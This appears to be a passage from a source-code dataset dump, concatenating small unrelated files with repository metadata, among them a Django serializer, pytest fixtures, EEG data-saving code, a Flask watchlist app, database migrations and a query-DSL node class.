] | 4 | 2021-03-18T23:34:38.000Z | 2021-06-04T22:27:26.000Z | src/api/serializers/operations.py | artinnok/billing-gateway | fbb0b358066a0038e775e6a9c4d40bcdf8f79e8e | [
"MIT"
] | 1 | 2020-02-11T09:20:30.000Z | 2020-02-11T09:20:30.000Z | from rest_framework.serializers import ModelSerializer
from billing.models import Operation
class OperationSerializer(ModelSerializer):
class Meta:
model = Operation
fields = ('id', 'direction', 'amount', 'fee', 'sender', 'receiver', 'payment', 'account',)
| 25.545455 | 98 | 0.704626 | 27 | 281 | 7.296296 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.174377 | 281 | 10 | 99 | 28.1 | 0.849138 | 0 | 0 | 0 | 0 | 0 | 0.170819 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
26444bcfc025a10d1d56e997d8f362078f4f5b52 | 367 | py | Python | app/tests/conftest.py | pkavousi/similar-users | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | [
"FTL",
"RSA-MD"
] | null | null | null | app/tests/conftest.py | pkavousi/similar-users | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | [
"FTL",
"RSA-MD"
] | null | null | null | app/tests/conftest.py | pkavousi/similar-users | 8434e0a03dc8dfa218a34601431c564dff3e80b6 | [
"FTL",
"RSA-MD"
] | null | null | null | from typing import Generator
import pytest
from fastapi.testclient import TestClient
from app.main import app
@pytest.fixture(scope="module")
def test_data():
sample_data = {"user_handle": 1}
return sample_data
@pytest.fixture()
def client() -> Generator:
with TestClient(app) as _client:
yield _client
app.dependency_overrides = {}
| 18.35 | 41 | 0.713896 | 46 | 367 | 5.543478 | 0.565217 | 0.101961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003378 | 0.19346 | 367 | 19 | 42 | 19.315789 | 0.858108 | 0 | 0 | 0 | 0 | 0 | 0.046322 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.307692 | 0 | 0.538462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
264e6add1ba15a65e94aadac1a00129404f02466 | 3,323 | py | Python | code/benchmark_networks/save_method.py | datalw/EEGdenoiseNet | f32d3a3e417fdc3c473854d3373ed470e89a67f9 | [
"MIT"
] | null | null | null | code/benchmark_networks/save_method.py | datalw/EEGdenoiseNet | f32d3a3e417fdc3c473854d3373ed470e89a67f9 | [
"MIT"
] | null | null | null | code/benchmark_networks/save_method.py | datalw/EEGdenoiseNet | f32d3a3e417fdc3c473854d3373ed470e89a67f9 | [
"MIT"
] | null | null | null | import os
import numpy as np
from data_prepare import *
from Network_structure import *
from loss_function import *
from train_method import *
def save_eeg(saved_model, result_location, foldername, save_train, save_vali, save_test,
noiseEEG_train, EEG_train, noiseEEG_val, EEG_val, noiseEEG_test, EEG_test, train_num, denoise_network, datanum):
if save_train == True:
try:
# generate every signal in training set
Denoiseoutput_train, _ = test_step(saved_model, noiseEEG_train, EEG_train, denoise_network, datanum)
if not os.path.exists(result_location +'/'+ foldername + '/' + train_num + '/' +'nn_output'):
os.makedirs(result_location +'/'+ foldername + '/' + train_num + '/'+ 'nn_output' )
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'noiseinput_train.npy', noiseEEG_train)
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'Denoiseoutput_train.npy', Denoiseoutput_train) ####################### change the adress!
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' + '/' + 'EEG_train.npy', EEG_train)
except:
print("Error during saving training signal.")
if save_vali == True:
try:
# generate every signal in test set
Denoiseoutput_val, _ = test_step(saved_model, noiseEEG_val, EEG_val, denoise_network, datanum)
if not os.path.exists(result_location +'/'+ foldername + '/' + train_num + '/'+ 'nn_output'):
os.makedirs(result_location +'/'+ foldername + '/' + train_num + '/'+ 'nn_output')
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' +'/' + 'noiseinput_val.npy', noiseEEG_val)
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' +'/' + 'Denoiseoutput_val.npy', Denoiseoutput_val) ####################### change the adress!
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' +'/' + 'EEG_val.npy', EEG_val)
except:
print("Error during saving validation signal.")
if save_test == True:
try:
# generate every signal in test set
Denoiseoutput_test, _ = test_step(saved_model, noiseEEG_test, EEG_test, denoise_network, datanum)
if not os.path.exists(result_location +'/'+ foldername + '/' + train_num + '/'+ 'nn_output'):
os.makedirs(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output')
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' +'/' + 'noiseinput_test.npy', noiseEEG_test)
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' +'/' + 'Denoiseoutput_test.npy', Denoiseoutput_test) ####################### change the adress!
np.save(result_location +'/'+ foldername + '/' + train_num + '/' + 'nn_output' +'/' + 'EEG_test.npy', EEG_test)
except:
print("Error during saving test signal.") | 70.702128 | 212 | 0.569064 | 344 | 3,323 | 5.19186 | 0.165698 | 0.12542 | 0.215006 | 0.243561 | 0.675812 | 0.585106 | 0.569429 | 0.569429 | 0.569429 | 0.515677 | 0 | 0 | 0.269335 | 3,323 | 47 | 213 | 70.702128 | 0.735585 | 0.050557 | 0 | 0.315789 | 0 | 0 | 0.14949 | 0.021732 | 0 | 0 | 0 | 0 | 0 | 1 | 0.026316 | false | 0 | 0.157895 | 0 | 0.184211 | 0.078947 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
267c0047e7d0c4375c0eee85199b970bfa59da8b | 567 | py | Python | contrib/C/libid3tag/test.py | finnianr/Eiffel-Loop | 387134fee1eae228abea6eea8f11a29ceef4c283 | [
"MIT"
] | 17 | 2016-03-15T19:41:19.000Z | 2021-12-25T18:55:17.000Z | contrib/C/libid3tag/test.py | finnianr/Eiffel-Loop | 387134fee1eae228abea6eea8f11a29ceef4c283 | [
"MIT"
] | 1 | 2017-05-18T18:55:03.000Z | 2017-05-18T19:14:10.000Z | contrib/C/libid3tag/test.py | finnianr/Eiffel-Loop | 387134fee1eae228abea6eea8f11a29ceef4c283 | [
"MIT"
] | 1 | 2016-11-18T18:18:41.000Z | 2016-11-18T18:18:41.000Z | import os
from os import path
from eiffel_loop.scons.c_library import LIBRARY_INFO
from eiffel_loop.package import TAR_GZ_SOFTWARE_PACKAGE
from eiffel_loop.package import SOFTWARE_PATCH
info = LIBRARY_INFO ('source/id3.getlib')
print 'is_list', isinstance (info.configure [0], list)
print 'url', info.url
print info.configure
print 'test_data', info.test_data
pkg = TAR_GZ_SOFTWARE_PACKAGE (info.url, info.c_dev, info.extracted)
patch = SOFTWARE_PATCH (info.patch_url, info.c_dev, info.extracted)
patch.apply ()
# create links to `include' and `test_dir'
| 21 | 68 | 0.784832 | 90 | 567 | 4.711111 | 0.411111 | 0.070755 | 0.099057 | 0.099057 | 0.264151 | 0.136792 | 0.136792 | 0 | 0 | 0 | 0 | 0.004016 | 0.121693 | 567 | 26 | 69 | 21.807692 | 0.84739 | 0.070547 | 0 | 0 | 0 | 0 | 0.068702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.384615 | null | null | 0.307692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
2681002937e85246bec45ea2f0afad09060bd398 | 306 | py | Python | phone_communication_backup_coalescer/__main__.py | phillipgreenii/phone_communication_backup_coalescer | 58b47e8d05c66b4f3deae8ae1bc2bdb2cf1b71d6 | [
"MIT"
] | null | null | null | phone_communication_backup_coalescer/__main__.py | phillipgreenii/phone_communication_backup_coalescer | 58b47e8d05c66b4f3deae8ae1bc2bdb2cf1b71d6 | [
"MIT"
] | 7 | 2015-06-01T11:33:10.000Z | 2021-05-24T13:29:31.000Z | phone_communication_backup_coalescer/__main__.py | phillipgreenii/phone_communication_backup_coalescer | 58b47e8d05c66b4f3deae8ae1bc2bdb2cf1b71d6 | [
"MIT"
] | null | null | null | '''
phone_communication_backup_coalescer
Copyright 2016, Phillip Green II
Licensed under MIT.
'''
import logging
import sys
import cli
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s:%(message)s')
def main():
cli.run(sys.argv[1:])
if __name__ == "__main__":
main()
| 14.571429 | 87 | 0.715686 | 41 | 306 | 5.073171 | 0.756098 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019011 | 0.140523 | 306 | 20 | 88 | 15.3 | 0.771863 | 0.29085 | 0 | 0 | 0 | 0 | 0.215311 | 0.119617 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | true | 0 | 0.375 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
26872cc3f537a0ffe66c811df2a6c89c185cd030 | 399 | py | Python | databases/migrations/2020_09_22_071121_add_data_pressure.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | databases/migrations/2020_09_22_071121_add_data_pressure.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | databases/migrations/2020_09_22_071121_add_data_pressure.py | krishotte/env_data2 | 379f3bef686e5668019d11351aa4dae4eae05d37 | [
"MIT"
] | null | null | null | from orator.migrations import Migration
class AddDataPressure(Migration):
def up(self):
"""
Run the migrations.
"""
with self.schema.table('data') as table:
table.float('pressure')
def down(self):
"""
Revert the migrations.
"""
with self.schema.table('data') as table:
table.drop_column('pressure')
| 21 | 48 | 0.553885 | 41 | 399 | 5.365854 | 0.560976 | 0.118182 | 0.154545 | 0.190909 | 0.436364 | 0.436364 | 0.436364 | 0.436364 | 0.436364 | 0.436364 | 0 | 0 | 0.325815 | 399 | 18 | 49 | 22.166667 | 0.817844 | 0.105263 | 0 | 0.25 | 0 | 0 | 0.077419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.125 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd2050df8a85fddacffc2ef8c51ed38d55e95d95 | 1,432 | py | Python | examples/action_models/AD4_XOr_2Actions_Test.py | pcyoung75/SysMPy | 2684e28eb8ad63c351e3327591bc2d988480e6a3 | [
"Apache-2.0"
] | null | null | null | examples/action_models/AD4_XOr_2Actions_Test.py | pcyoung75/SysMPy | 2684e28eb8ad63c351e3327591bc2d988480e6a3 | [
"Apache-2.0"
] | null | null | null | examples/action_models/AD4_XOr_2Actions_Test.py | pcyoung75/SysMPy | 2684e28eb8ad63c351e3327591bc2d988480e6a3 | [
"Apache-2.0"
] | null | null | null | from sysmpy import *
import asyncio
"""
+---------------+
| |
| start |
| |
+---------------+
| process
+---------(XO)----------+
| p1 | p2
+---------------+ +---------------+
| | | |
| Action1 | | Action2 |
| | | |
+---------------+ +---------------+
| |
+---------(XO)----------+
|
+---------------+
| |
| End |
| |
+---------------+
"""
print('AD4_XOr_2Actions_Test')
###############################################
# 1 Define a model
p = Process("process")
p_or = p.XOr()
p1 = p_or.Process("p1")
p2 = p_or.Process("p2")
p_act1 = p1.Action("Action1")
p_act2 = p2.Action("Action2")
###############################################
# 2 Run a simulation
asyncio.run(p.sim(print_out=True))
| 34.926829 | 57 | 0.168994 | 61 | 1,432 | 3.819672 | 0.52459 | 0.038627 | 0.085837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02995 | 0.580307 | 1,432 | 40 | 58 | 35.8 | 0.357737 | 0.024441 | 0 | 0 | 0 | 0 | 0.179688 | 0.082031 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd24412577cb4d8966d1f35a9dca22dd26ef8547 | 522 | py | Python | minpmt.py | joeryan/mit600x | 18c9c6606d9476b436216eccc6fae5b7ef5b6015 | [
"MIT"
] | null | null | null | minpmt.py | joeryan/mit600x | 18c9c6606d9476b436216eccc6fae5b7ef5b6015 | [
"MIT"
] | null | null | null | minpmt.py | joeryan/mit600x | 18c9c6606d9476b436216eccc6fae5b7ef5b6015 | [
"MIT"
] | null | null | null | # edX MIT6.00.1x programming in python
# problem set 2, week 2, problem 2
# minumum payment to pay off debt in one year
annualInterestRate = 0.2
balance = 3926.0
monthlyInterest = annualInterestRate / 12
remainingBal = balance
monthlyPmt = 10
while (remainingBal > 0):
for month in range(1,13):
remainingBal -= monthlyPmt
remainingBal += monthlyInterest * remainingBal
if remainingBal > 0:
remainingBal = balance
monthlyPmt += 10
print "Lowest Payment: %d" % monthlyPmt | 24.857143 | 54 | 0.687739 | 62 | 522 | 5.790323 | 0.612903 | 0.10585 | 0.16156 | 0.172702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062972 | 0.239464 | 522 | 21 | 55 | 24.857143 | 0.84131 | 0.216475 | 0 | 0.153846 | 0 | 0 | 0.044335 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd2dddb933352e4e52dfaa33fde7af380ff1ac57 | 171 | py | Python | src/config/deprecated/tos-tossim/tester.py | BigstarPie/WuKongProject | e8e4a9d3f56732b2fdc8c5c48d0be93d31f57376 | [
"BSD-2-Clause-FreeBSD"
] | 16 | 2015-01-07T10:32:47.000Z | 2019-01-16T16:13:51.000Z | src/config/deprecated/tos-tossim/tester.py | BigstarPie/WuKongProject | e8e4a9d3f56732b2fdc8c5c48d0be93d31f57376 | [
"BSD-2-Clause-FreeBSD"
] | 14 | 2015-05-01T04:45:45.000Z | 2016-05-11T01:29:23.000Z | src/config/deprecated/tos-tossim/tester.py | BigstarPie/WuKongProject | e8e4a9d3f56732b2fdc8c5c48d0be93d31f57376 | [
"BSD-2-Clause-FreeBSD"
] | 13 | 2015-06-17T06:42:17.000Z | 2020-11-27T18:23:08.000Z | import sys
from TOSSIM import *
t = Tossim([])
t.runNextEvent()
m = t.getNode(32)
m.turnOn()
t.addChannel("DEBUG", sys.stdout)
while (m.isOn()==1):
t.runNextEvent()
| 14.25 | 33 | 0.654971 | 26 | 171 | 4.307692 | 0.615385 | 0.232143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020548 | 0.146199 | 171 | 11 | 34 | 15.545455 | 0.746575 | 0 | 0 | 0.222222 | 0 | 0 | 0.029412 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
cd4deeae46aef01f74825efa49b6f08354b32266 | 7,875 | py | Python | app.py | guof25/watchlist | 1c35ee4bd70e4cd83007f38a490f6a14a1e060b7 | [
"MIT"
] | null | null | null | app.py | guof25/watchlist | 1c35ee4bd70e4cd83007f38a490f6a14a1e060b7 | [
"MIT"
] | null | null | null | app.py | guof25/watchlist | 1c35ee4bd70e4cd83007f38a490f6a14a1e060b7 | [
"MIT"
] | null | null | null | from watchlist import app
'''
from flask import Flask,url_for,render_template,request,flash,redirect # 引入Flask类 ,url_for反向解析
from faker import Factory # 使用faker生成测试数据
from settings import DebugMode,TestingMode # 设置模式
from flask_sqlalchemy import SQLAlchemy # 数据库扩展
from werkzeug.security import generate_password_hash,check_password_hash #密码加密、验证
from flask_login import LoginManager,login_user,UserMixin,login_required, logout_user,current_user #用户认证
import os
import sys
import click #命令行工具
# **************** flask实例化 *******************
app = Flask(__name__)
#*************** 数据库扩展********************
# sqlite,文件型数据库
WIN = sys.platform.startswith("win")
if WIN:
prefix = "sqlite:///"
else:
prefix = "sqlite:////"
app.config["SQLALCHEMY_DATABASE_URI"] = prefix + os.path.join(app.root_path,"data.db")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app) #初始化db对象
# ********************** 开发模式设置 *************************
app.config.from_object(DebugMode) #开启DEBUG模式,直接在前端页面显示错误代码
#app.config.from_object(TestingMode) #而在TESTING模式下前端页面之会提示错误,并不会有具体代码
# ***********************用户认证 ××××××××××××××××××××××××××××××××××
login_manager = LoginManager(app)
login_manager.login_view = 'login'
@login_manager.user_loader
def load_user(user_id):
user = User.query.get(int(user_id))
return user
# ************************ 定义模型类 ****************************************class User(db.Model):
class User(db.Model,UserMixin): #继承自db.Model
__tablename__ = "wl_user" # 数据库表名,未定义则默认是类名
id = db.Column(db.Integer,primary_key=True) # flask中主键必须显示定义,自增长类型
name = db.Column(db.String(20))
username = db.Column(db.String(20))
password_hash =db.Column(db.String(128))
def set_password(self,password):
self.password_hash = generate_password_hash(password)
def validate_password(self,password):
return check_password_hash(self.password_hash,password)
class Movie(db.Model):
__tablename__ = "wl_movie"
id = db.Column(db.Integer,primary_key=True)
title = db.Column(db.String(20))
year = db.Column(db.String(4))
# ************************* 项目测试数据 ******************************
fake = Factory.create() # 通过fake扩展模块来生成测试数据
#fake = Factory.create('zh_CN') 本地化
# 使用click方式生成数据库数据
@app.cli.command() #命令注册
def gen_db_data():
db.drop_all()
db.create_all()
users = []
movies = []
for i in range(10):
item = {}
item["title"] = fake.name()
item["year"] = fake.year()
movies.append(item)
for i in range(1):
item = {}
item["name"]=fake.name()
users.append(item)
db.session.bulk_insert_mappings(User,users) # 批量插入数据
db.session.bulk_insert_mappings(Movie,movies)
db.session.commit()
click.echo("data generated!")
# *************** 生成管理员账户 *******************************
@app.cli.command()
@click.option("--username",prompt=True,help="the username used to login")
@click.option("--password",prompt=True,hide_input=True,confirmation_prompt=True,help="the password used to login")
def admin(username,password):
user = User.query.first()
if user is not None:
click.echo("update user..")
user.name="admin"
user.username = username
user.set_password(password)
else:
click.echo("creating user..")
user = User(username = username,name="admin")
user.set_password(password)
DB.session.add(user)
db.session.commit()
click.echo("done..")
# **************** 模板全局变量注册 ******************************
@app.context_processor #所有模板都可获取的变量
def inject_user():
user = User.query.first()
return dict(user=user)
# ******************* 错误响应 **********************************
# 404 错误
@app.errorhandler(404) # app.errorhandler中注册错误代码
def page_not_found(e): # 接受异常信息作为参数
user = User.query.first()
return render_template("404_extend.html"),404 # 返回状态码作为第二个参数 ,普通响应函数默认是200,所以不用写
# ******************* 模板过滤器 ************************************
#自定义模板过滤器
@app.template_filter("my_filter") # 过滤器名称注册
def gf(value):
return value.replace('name','guof')
# ****************** 路由与响应函数 *******************************
# 主页
@app.route("/",methods=['GET','POST']) #路由注册,未指定methods则默认是只接受get方法
def index():
# request只有在请求触发时才会包含数据,所以你只能在视图函数内部调用它
if request.method == "POST": #根据request.method来判断是GET/POST
if not current_user.is_authenticated: # 如果当前用户未认证
flash("not login..")
return redirect(url_for('index')) # 重定向到主页
title = request.form.get("title")
year = request.form.get("year")
if not all([title,year]):
#flash() 函数用来在视图函数里向模板传递提示消息,消息存储在session中
#get_flashed_messages() 函数则用来在模板中获取提示消息
flash("title and year are required.")
return redirect(url_for('index'))
elif len(year)!=4 or len(title)>60:
flash("info format is invalid")
return redirect(url_for('index'))
movie = Movie(title=title,year=year)
db.session.add(movie)
db.session.commit()
flash("item created.")
return redirect(url_for('index'))
else:
user = User.query.first()
movies = Movie.query.all()
return render_template("index_extend.html",movies=movies)
# 删除记录
@app.route("/del/<int:id>",methods=['GET','POST'])
@login_required
def delMovie(id):
movie = Movie.query.get_or_404(id)
db.session.delete(movie)
db.session.commit()
flash("item deleted!")
return redirect(url_for('index'))
# 更新记录
@app.route('/edit/<int:movie_id>', methods=['GET', 'POST'])
@login_required
def edit(movie_id):
movie = Movie.query.get_or_404(movie_id)
if request.method == 'POST': # 处理编辑表单的提交请求
title = request.form['title']
year = request.form['year']
if not title or not year or len(year) != 4 or len(title) > 60:
flash('Invalid input.')
return redirect(url_for('edit', movie_id=movie.id)) # 重定向回对应的编辑页面
movie.title = title
movie.year = year
db.session.commit()
flash('Item updated.')
return redirect(url_for('index'))
else:
return render_template('edit_extend.html', movie=movie)
# 登录页面
@app.route('/login',methods=['GET','POST'])
def login():
if request.method == "POST":
username = request.form["username"]
password = request.form["password"]
if not all([username,password]):
flash("invalid input")
return redirect(url_for('login'))
user = User.query.first()
if username == user.username and user.validate_password(password):
login_user(user) #使用flask-login提供的login_user函数
flash('Login success.')
return redirect(url_for('index')) # 重定向到主页
else:
flash('Invalid username or password.') # 如果验证失败, 显示错误消息
return redirect(url_for('login')) # 重定向回登录页面
else:
return render_template('login_extend.html')
# 登出页面
@app.route('/logou')
@login_required
def logout():
logout_user()
flash("Goodbye.")
return redirect(url_for('index')) # 重定向到主页
@app.route('/settings',methods=['GET','POST'])
@login_required
def settings():
if request.method == 'POST':
name = request.form["name"]
if not name or len(name)>20:
flash("invalid username")
return redirect(url_for('settings'))
current_user.name = name
db.session.commit()
flash("settings updated")
return redirect(url_for('index'))
else:
return render_template('settings.html')
'''
# ************************* flask程序启动 *********************************
if __name__ == "__main__":
app.run()
| 33.368644 | 114 | 0.594794 | 890 | 7,875 | 5.162921 | 0.273034 | 0.018281 | 0.048096 | 0.056583 | 0.216322 | 0.135147 | 0.089445 | 0.049619 | 0.024374 | 0.024374 | 0 | 0.006716 | 0.205841 | 7,875 | 235 | 115 | 33.510638 | 0.722578 | 0.008889 | 0 | 0 | 0 | 0 | 0.112676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
cd5ac9f446b1220c704f787f2f973a8cf1ad49f9 | 1,700 | py | Python | _GTW/_OMP/_Auth/Account_in_Group.py | Tapyr/tapyr | 4235fba6dce169fe747cce4d17d88dcf4a3f9f1d | [
"BSD-3-Clause"
] | 6 | 2016-12-10T17:51:10.000Z | 2021-10-11T07:51:48.000Z | _GTW/_OMP/_Auth/Account_in_Group.py | Tapyr/tapyr | 4235fba6dce169fe747cce4d17d88dcf4a3f9f1d | [
"BSD-3-Clause"
] | null | null | null | _GTW/_OMP/_Auth/Account_in_Group.py | Tapyr/tapyr | 4235fba6dce169fe747cce4d17d88dcf4a3f9f1d | [
"BSD-3-Clause"
] | 3 | 2020-03-29T07:37:03.000Z | 2021-01-21T16:08:40.000Z | # -*- coding: utf-8 -*-
# Copyright (C) 2010-2013 Mag. Christian Tanzer All rights reserved
# Glasauergasse 32, A--1130 Wien, Austria. tanzer@swing.co.at
# ****************************************************************************
# This module is part of the package GTW.OMP.Auth.
#
# This module is licensed under the terms of the BSD 3-Clause License
# <http://www.c-tanzer.at/license/bsd_3c.html>.
# ****************************************************************************
#
#++
# Name
# GTW.OMP.Auth.Account_in_Group
#
# Purpose
# Model association Account_in_Group
#
# Revision Dates
# 16-Jan-2010 (CT) Creation
# 18-Jan-2010 (CT) `auto_cache` added
# 15-May-2013 (CT) Rename `auto_cache` to `auto_rev_ref`
# ««revision-date»»···
#--
from _MOM.import_MOM import *
from _GTW import GTW
from _GTW._OMP._Auth import Auth
import _GTW._OMP._Auth.Entity
import _GTW._OMP._Auth.Account
import _GTW._OMP._Auth.Group
from _TFL.I18N import _, _T, _Tn
_Ancestor_Essence = Auth.Link2
class Account_in_Group (_Ancestor_Essence) :
"""Model association Account_in_Group"""
class _Attributes (_Ancestor_Essence._Attributes) :
_Ancestor = _Ancestor_Essence._Attributes
class left (_Ancestor.left) :
role_type = Auth.Account
auto_rev_ref = True
# end class left
class right (_Ancestor.right) :
role_type = Auth.Group
auto_rev_ref = True
# end class right
# end class _Attributes
# end class Account_in_Group
if __name__ != "__main__" :
GTW.OMP.Auth._Export ("*")
### __END__ GTW.OMP.Auth.Account_in_Group
| 26.153846 | 78 | 0.594706 | 209 | 1,700 | 4.535885 | 0.435407 | 0.050633 | 0.084388 | 0.053797 | 0.160338 | 0.097046 | 0 | 0 | 0 | 0 | 0 | 0.028679 | 0.220588 | 1,700 | 64 | 79 | 26.5625 | 0.681509 | 0.512353 | 0 | 0.105263 | 0 | 0 | 0.011335 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
cd7163ba843663ad805f853b3b02b2587fa6d694 | 1,038 | py | Python | karp/query_dsl/node.py | spraakbanken/karp-backend-v6-tmp | e5b78157bd999df18c188973ae2a337015b6f35d | [
"MIT"
] | 1 | 2021-12-08T15:33:42.000Z | 2021-12-08T15:33:42.000Z | karp/query_dsl/node.py | spraakbanken/karp-backend-v6-tmp | e5b78157bd999df18c188973ae2a337015b6f35d | [
"MIT"
] | null | null | null | karp/query_dsl/node.py | spraakbanken/karp-backend-v6-tmp | e5b78157bd999df18c188973ae2a337015b6f35d | [
"MIT"
] | null | null | null | class Node:
def __init__(self, type_, arity: int, value=None):
self.type = type_
self.arity = arity
self.value = value
self.children = []
def __repr__(self):
return "<Node {t} {v} {c}>".format(t=self.type, v=self.value, c=self.children)
def _pprint(self, level):
fill = " "
print(
"{indent} Node {t} {v}".format(
indent=fill * level, t=self.type, v=self.value
)
)
for child in self.children:
child._pprint(level + 1)
def pprint(self, level: int = 0):
self._pprint(level)
def add_child(self, child):
self.children.append(child)
def n_children(self) -> int:
return len(self.children)
def gen_stream(self):
yield self
for child in self.children:
yield from child.gen_stream()
def create_unary_node(type_, value=None):
return Node(type_, 1, value)
def create_binary_node(type_, value=None):
return Node(type_, 2, value)
| 24.714286 | 86 | 0.569364 | 135 | 1,038 | 4.192593 | 0.288889 | 0.127208 | 0.079505 | 0.035336 | 0.254417 | 0.176678 | 0.109541 | 0 | 0 | 0 | 0 | 0.005563 | 0.307322 | 1,038 | 41 | 87 | 25.317073 | 0.781641 | 0 | 0 | 0.064516 | 0 | 0 | 0.038536 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.290323 | false | 0 | 0 | 0.129032 | 0.451613 | 0.16129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
cd79fbd3b3e7215ef315a80dd8ce6ee0fef9eb15 | 4,335 | py | Python | Buffer Overflow BOF Scripts/FFTPS_v1.0.py | JAYMONSECURITY/JMSec-Blog-Resources | 61bcab0cbfceab8d46c039f5a5165b8f9da6737f | [
"MIT"
